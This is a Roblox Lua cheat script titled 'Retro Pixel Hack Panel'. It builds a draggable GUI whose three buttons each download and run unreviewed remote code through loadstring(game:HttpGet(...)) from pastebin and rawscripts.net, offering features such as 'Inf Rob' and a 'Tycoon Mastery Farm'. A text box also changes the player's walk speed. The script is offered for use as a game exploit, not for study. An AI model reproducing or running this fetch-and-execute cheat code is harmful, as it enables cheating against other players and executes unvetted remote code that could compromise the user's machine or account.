-- FE LUA: Retro Pixel Hack Panel UI by ItzOutlaw local player = game:GetService("Players").LocalPlayer local mouse = player:GetMouse() -- UI Setup local gui = Instance.new("ScreenGui", player:WaitForChild("PlayerGui")) gui.Name = "HackPanelUI" gui.ResetOnSpawn = false local mainFrame = Instance.new("Frame") mainFrame.Size = UDim2.new(0, 420, 0, 210) mainFrame.Position = UDim2.new(0.25, 0, 0.25, 0) mainFrame.BackgroundColor3 = Color3.fromRGB(50, 30, 10) mainFrame.BorderColor3 = Color3.fromRGB(0, 255, 0) mainFrame.BorderSizePixel = 3 mainFrame.Active = true mainFrame.Draggable = true mainFrame.Parent = gui -- Title local title = Instance.new("TextLabel", mainFrame) title.Size = UDim2.new(1, 0, 0, 30) title.Position = UDim2.new(0, 0, 0, 0) title.BackgroundTransparency = 1 title.Text = "Hack Panel" title.Font = Enum.Font.Arcade title.TextColor3 = Color3.fromRGB(255, 255, 255) title.TextScaled = true -- Button Function Creator local function createButton(name, pos, text, callback) local btn = Instance.new("TextButton", mainFrame) btn.Size = UDim2.new(0, 130, 0, 40) btn.Position = pos btn.Text = text btn.BackgroundColor3 = Color3.fromRGB(0, 90, 0) btn.BorderColor3 = Color3.fromRGB(0, 255, 0) btn.TextColor3 = Color3.new(1, 1, 1) btn.Font = Enum.Font.Arcade btn.TextScaled = true btn.MouseButton1Click:Connect(callback) end -- Buttons createButton("InfRob", UDim2.new(0, 10, 0, 40), "Inf Rob", function() loadstring(game:HttpGet("https://pastebin.com/raw/JC8jXZit"))() end) createButton("GetGlove", UDim2.new(0, 145, 0, 40), "Get FE Quantium Glove", function() loadstring(game:HttpGet("https://pastebin.com/raw/RSf1PxtC"))() end) createButton("Tycoon", UDim2.new(0, 280, 0, 40), "Tycoon Mastery Farm", function() loadstring(game:HttpGet("https://rawscripts.net/raw/UPDATE-Slap-Battles-Tycoon-Farm-43306"))() end) -- Warning under 3rd button local warning = Instance.new("TextLabel", mainFrame) warning.Size = UDim2.new(0, 130, 0, 20) warning.Position = UDim2.new(0, 280, 0, 85) warning.BackgroundTransparency = 1 warning.Text = "PERMANENT! REJOIN TO REMOVE" warning.TextColor3 = Color3.new(1, 0, 0) warning.Font = Enum.Font.Arcade warning.TextScaled = true -- Speed control local speedBox = Instance.new("TextBox", mainFrame) speedBox.Size = UDim2.new(0, 400, 0, 35) speedBox.Position = UDim2.new(0, 10, 1, -45) speedBox.PlaceholderText = "Enter Speed (20-100)" speedBox.Text = "" speedBox.BackgroundColor3 = Color3.fromRGB(10, 10, 10) speedBox.TextColor3 = Color3.new(1, 1, 1) speedBox.Font = Enum.Font.Arcade speedBox.TextScaled = true speedBox.FocusLost:Connect(function(enterPressed) if enterPressed then local val = tonumber(speedBox.Text) if val and val >= 20 and val <= 100 then player.Character.Humanoid.WalkSpeed = val else speedBox.Text = "Invalid (20-100)!" end end end)